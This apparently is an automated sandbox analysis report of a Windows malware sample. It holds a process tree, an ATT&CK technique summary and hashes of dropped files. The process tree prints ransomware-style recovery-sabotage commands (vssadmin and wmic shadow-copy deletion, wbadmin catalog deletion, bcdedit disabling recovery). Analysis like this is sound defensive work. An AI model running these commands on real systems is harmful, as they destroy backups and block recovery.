                                                                                          • C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                                            C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4684
                                                                                          • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                            C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:4692
                                                                                            • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                              C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:4784
                                                                                          • C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                                            C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            PID:5504
                                                                                          • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                            C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:2076
                                                                                            • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                              C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              PID:4528
                                                                                          • C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                                            C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            PID:5632
                                                                                          • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                            C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:4312
                                                                                            • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                              C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              PID:5824
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                          1⤵
                                                                                            PID:284
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                            1⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:4780
                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies Internet Explorer settings
                                                                                            PID:5052
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:3868
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:4816
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Drops file in Windows directory
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4920
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                              PID:4576
                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              PID:5580
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:5496
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:3852
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              PID:3856
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                              1⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              PID:5312
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:4992
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:4732
                                                                                            • C:\Users\Admin\AppData\Local\Temp\F6D4.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\F6D4.exe
                                                                                              1⤵
                                                                                                PID:3412
                                                                                              • C:\Users\Admin\AppData\Local\Temp\FC63.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\FC63.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4708
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:6036
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:4824
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5840
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5476
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5936
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Checks for any installed AV software in registry
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5628
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5116
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:2992
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5616
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:4180
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D475.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\D475.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Enumerates connected drives
                                                                                                            PID:4772
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 760
                                                                                                              2⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Program crash
                                                                                                              PID:5672
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 812
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4116
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 824
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:1968
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 972
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4972
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1080
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5852
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1140
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5696
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1248
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5964
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1468
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:6132
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1580
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Program crash
                                                                                                              PID:3412
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1536
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:3884
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1780
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:5200
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1788
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4536
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1748
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:2360
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1520
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4572
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D475.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\D475.exe" -agent 0
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Modifies extensions of user files
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Drops file in Windows directory
                                                                                                              PID:5520
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                              2⤵
                                                                                                                PID:5048
                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                  wmic shadowcopy delete
                                                                                                                  3⤵
                                                                                                                    PID:5780
                                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                    3⤵
                                                                                                                    • Interacts with shadow copies
                                                                                                                    PID:2364
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                  2⤵
                                                                                                                  • Blocklisted process makes network request
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5156
                                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                    3⤵
                                                                                                                    • Interacts with shadow copies
                                                                                                                    PID:5924
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                  2⤵
                                                                                                                    PID:6124
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                    2⤵
                                                                                                                      PID:5632
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                      2⤵
                                                                                                                        PID:4144
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                        2⤵
                                                                                                                          PID:1276
                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                            wmic shadowcopy delete
                                                                                                                            3⤵
                                                                                                                              PID:4692
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1880
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6032
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 1888
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:4640
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            notepad.exe
                                                                                                                            2⤵
                                                                                                                              PID:3044
                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                            1⤵
                                                                                                                              PID:4160
                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                              1⤵
                                                                                                                                PID:780
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:3988
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                  1⤵
                                                                                                                                    PID:2956
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\90CA.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\90CA.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:3452
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:4840
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:1904

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                    Persistence

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    1
                                                                                                                                    T1060

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Defense Evasion

                                                                                                                                    File Deletion

                                                                                                                                    2
                                                                                                                                    T1107

                                                                                                                                    Modify Registry

                                                                                                                                    3
                                                                                                                                    T1112

                                                                                                                                    BITS Jobs

                                                                                                                                    1
                                                                                                                                    T1197

                                                                                                                                    Install Root Certificate

                                                                                                                                    1
                                                                                                                                    T1130

                                                                                                                                    Credential Access

                                                                                                                                    Credentials in Files

                                                                                                                                    3
                                                                                                                                    T1081

                                                                                                                                    Discovery

                                                                                                                                    Software Discovery

                                                                                                                                    1
                                                                                                                                    T1518

                                                                                                                                    Query Registry

                                                                                                                                    5
                                                                                                                                    T1012

                                                                                                                                    System Information Discovery

                                                                                                                                    6
                                                                                                                                    T1082

                                                                                                                                    Security Software Discovery

                                                                                                                                    1
                                                                                                                                    T1063

                                                                                                                                    Peripheral Device Discovery

                                                                                                                                    2
                                                                                                                                    T1120

                                                                                                                                    Remote System Discovery

                                                                                                                                    1
                                                                                                                                    T1018

                                                                                                                                    Collection

                                                                                                                                    Data from Local System

                                                                                                                                    3
                                                                                                                                    T1005

                                                                                                                                    Command and Control

                                                                                                                                    Web Service

                                                                                                                                    1
                                                                                                                                    T1102

                                                                                                                                    Impact

                                                                                                                                    Inhibit System Recovery

                                                                                                                                    2
                                                                                                                                    T1490

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                      MD5

                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                      SHA1

                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                      SHA256

                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                      SHA512

                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                    • C:\Program Files\Windows Security\YZURNWMYNO\ultramediaburner.exe
                                                                                                                                      MD5

                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                      SHA1

                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                      SHA256

                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                      SHA512

                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                    • C:\Program Files\Windows Security\YZURNWMYNO\ultramediaburner.exe
                                                                                                                                      MD5

                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                      SHA1

                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                      SHA256

                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                      SHA512

                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                    • C:\Program Files\install.dat
                                                                                                                                      MD5

                                                                                                                                      806c3221a013fec9530762750556c332

                                                                                                                                      SHA1

                                                                                                                                      36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                      SHA256

                                                                                                                                      9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                      SHA512

                                                                                                                                      56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                    • C:\Program Files\install.dat
                                                                                                                                      MD5

                                                                                                                                      31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                      SHA1

                                                                                                                                      c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                      SHA256

                                                                                                                                      b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                      SHA512

                                                                                                                                      3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                    • C:\Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • C:\Program Files\install.dll
                                                                                                                                      MD5

                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                      SHA1

                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                      SHA256

                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                      SHA512

                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                    • C:\Program Files\libEGL.dll
                                                                                                                                      MD5

                                                                                                                                      cc0f81a657d6887e246f49151e60123d

                                                                                                                                      SHA1

                                                                                                                                      1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                                      SHA256

                                                                                                                                      31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                                      SHA512

                                                                                                                                      8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                      MD5

                                                                                                                                      4c8fe6b2f96e01a5a6d418a7f1c843a7

                                                                                                                                      SHA1

                                                                                                                                      51842e81863c205e888bffe034a3abbf642c5419

                                                                                                                                      SHA256

                                                                                                                                      e6272d58a61f01f31f18f7b4ecc85232a1e71be4b9e93570395ad825e5ca6afa

                                                                                                                                      SHA512

                                                                                                                                      209986a1b77f039dac3c4e51a7c2a54af77b47261373e4f97290c8de21511dc181549ce656585c546ef616922aef5ee88f9d3cc98ae98e2b426dd4072688824a

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                      MD5

                                                                                                                                      745db20fd3e289a001fd17d7e73c7b28

                                                                                                                                      SHA1

                                                                                                                                      6e99d180a44e0f9226672e9c5cfd796561f3e619

                                                                                                                                      SHA256

                                                                                                                                      d1e8b6205077152ab171194ebac11a5a6afa62be991643d99d7831412eea96c4

                                                                                                                                      SHA512

                                                                                                                                      8a33dcef7f679f12c34151b0dbacbe738d0d46c75e73f67a93d494117c04376ea3a52ffa5b8adf8b319b380f690b444d2fa1db8d195587bfe938a716869a7a42

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                      MD5

                                                                                                                                      60f6b2c801a2a958b06c893b74b19282

                                                                                                                                      SHA1

                                                                                                                                      da0e286f2d50cc4f731f3fcec60de23069faf17f

                                                                                                                                      SHA256

                                                                                                                                      593de34d0c7012a797f118d197186c85f0bd1fd4d3a70fa84e3ea89f9f980032

                                                                                                                                      SHA512

                                                                                                                                      406ca703da00617705fbe0c5b9f6be656fffd3f43a8f68e6ccff78e24e5ef8b024f3f2dd1a28d63888abab10aacdab3a78bce0f2656e08b373e4ef8b0717833d

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                      MD5

                                                                                                                                      576c3c810f9430b9cf415796d33d9ac3

                                                                                                                                      SHA1

                                                                                                                                      1e16bef38d541612982f1a6355217c841712f26a

                                                                                                                                      SHA256

                                                                                                                                      c40350fa3d98334e7b6d7194e3ea3dc35d8f56c0b0bf8247bea1a1df1e625c44

                                                                                                                                      SHA512

                                                                                                                                      85ae8d29b999f6e7e5b1fbeb790a1554723d08146a83fc5b1f3b391dcd9cea5fbc0879e2df97b734a9b9303f02777a53b155dff372756139e92f944476e19a8a

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                      MD5

                                                                                                                                      dc0c54d6a40659647bedbf59c5cad37c

                                                                                                                                      SHA1

                                                                                                                                      e719ad1df247aa1d221149c0a0cc10daf0709a28

                                                                                                                                      SHA256

                                                                                                                                      54cc035e8a698546d75f3687fbbca1f38106b2d3e2b059be9a8f0a9f5de8cff2

                                                                                                                                      SHA512

                                                                                                                                      10317d562cd2afdf4f4613679547173b693cc40113cab1e391709d421499e6dbb9fee0238fc403d249c75e9c75f493f97e98337e2cd9a52b988bff38d8a86ef6

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                      MD5

                                                                                                                                      f33e2d13e4382e9e3ac1b016a394e2df

                                                                                                                                      SHA1

                                                                                                                                      5eaf5950d5f670aa18a56ac54df0dd70ba7c6000

                                                                                                                                      SHA256

                                                                                                                                      a2ff0f846c69474db1556e911ba7076c7ac2a8c9f230f0a7d7aeec76fb1ec6d2

